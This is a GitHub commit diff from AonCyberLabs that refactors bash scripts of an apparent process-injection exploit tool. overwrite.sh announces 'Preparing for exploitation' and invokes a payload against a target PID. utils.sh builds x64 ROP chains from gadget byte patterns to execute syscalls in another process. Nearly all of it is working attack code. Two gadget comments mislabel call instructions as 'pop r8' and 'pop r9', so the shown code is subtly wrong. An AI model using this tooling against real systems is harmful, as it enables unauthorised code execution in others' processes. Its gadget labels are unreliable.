clean up fnargs

AonCyberLabs · Jul 13, 2017 · 3e9c452 · 3e9c452
1 parent 890357c
commit 3e9c452
Show file tree

Hide file tree

Showing 2 changed files with 20 additions and 43 deletions.
diff --git a/overwrite.sh b/overwrite.sh
@@ -1,11 +1,11 @@
 #!/bin/bash
 STARTTIME=$(date +%s)
-SLEEPLEN=90
+SLEEPLEN=30
 echo "Preparing for exploitation, finding LD_PRELOAD if necessary" >&2
 sleep 30 2>/dev/null &
 PID=$!
 TARGET=${1}
-PRELOAD=$(bash payload.sh ${PID} ${TARGET} PREPARE 2>/dev/null)
+PRELOAD=$(bash payload.sh ${PID} ${TARGET} PREPARE 2>preload.log)
 [[ ! $? -eq 0 ]] && exit 1
 
 if [[ ! -z "${PRELOAD[@]}" ]]; then

diff --git a/utils.sh b/utils.sh
@@ -155,47 +155,24 @@ fnargs() {
 	SYSCALLSIZE=$((${SYSCALLSIZE}+2))
 	[[ -z ${1} ]] && return
 
-	findgadget "$(printf "\x5f\xc3")"                    # pop rdi ; ret
-	SYSCALL=${SYSCALL}${gadgetaddr}
-	SYSCALL=${SYSCALL}$(hexlify ${1})
-	shift
-	SYSCALLSIZE=$((${SYSCALLSIZE}+2))
-	[[ -z ${1} ]] && return
-
-	findgadget "$(printf "\x5e\xc3")"                    # pop rsi ; ret
-	SYSCALL=${SYSCALL}${gadgetaddr}
-	SYSCALL=${SYSCALL}$(hexlify ${1})
-	shift
-	SYSCALLSIZE=$((${SYSCALLSIZE}+2))
-	[[ -z ${1} ]] && return
-
-	findgadget "$(printf "\x5a\xc3")"                    # pop rdx ; ret
-	SYSCALL=${SYSCALL}${gadgetaddr}
-	SYSCALL=${SYSCALL}$(hexlify ${1})
-	shift
-	SYSCALLSIZE=$((${SYSCALLSIZE}+2))
-	[[ -z ${1} ]] && return
-
-	findgadget "$(printf "\x59\xc3")"                    # pop rcx ; ret
-	SYSCALL=${SYSCALL}${gadgetaddr}
-	SYSCALL=${SYSCALL}$(hexlify ${1})
-	shift
-	SYSCALLSIZE=$((${SYSCALLSIZE}+2))
-	[[ -z ${1} ]] && return
-
-	findgadget "$(printf "\xff\xd0\xc3")"                # pop r8 ; ret
-	SYSCALL=${SYSCALL}${gadgetaddr}
-	SYSCALL=${SYSCALL}$(hexlify ${1})
-	shift
-	SYSCALLSIZE=$((${SYSCALLSIZE}+2))
-	[[ -z ${1} ]] && return
-
-	findgadget "$(printf "\xff\xd1\xc3")"                # pop r9 ; ret
-	SYSCALL=${SYSCALL}${gadgetaddr}
-	SYSCALL=${SYSCALL}$(hexlify ${1})
-	shift
-	SYSCALLSIZE=$((${SYSCALLSIZE}+2))
-	[[ -z ${1} ]] && return
+	# this is from the x64 Linux ABI
+	GADGETS=(
+		"\x5f\xc3"     # pop rdi; ret
+		"\x5e\xc3"     # pop rsi; ret
+		"\x5a\xc3"     # pop rdx; ret
+		"\x59\xc3"     # pop rcx; ret
+		"\xff\xd0\xc3" # pop r8 ; ret
+		"\xff\xd1\xc3" # pop r9 ; ret
+		)
+
+	for gadget in ${GADGETS[@]}; do
+		findgadget "$(printf ${gadget})"
+		SYSCALL=${SYSCALL}${gadgetaddr}
+		SYSCALL=${SYSCALL}$(hexlify ${1})
+		shift
+		SYSCALLSIZE=$((${SYSCALLSIZE}+2))
+		[[ -z ${1} ]] && break
+	done
 }
 
 # execute a syscall in the ROPChain, with all arguments setup appropriately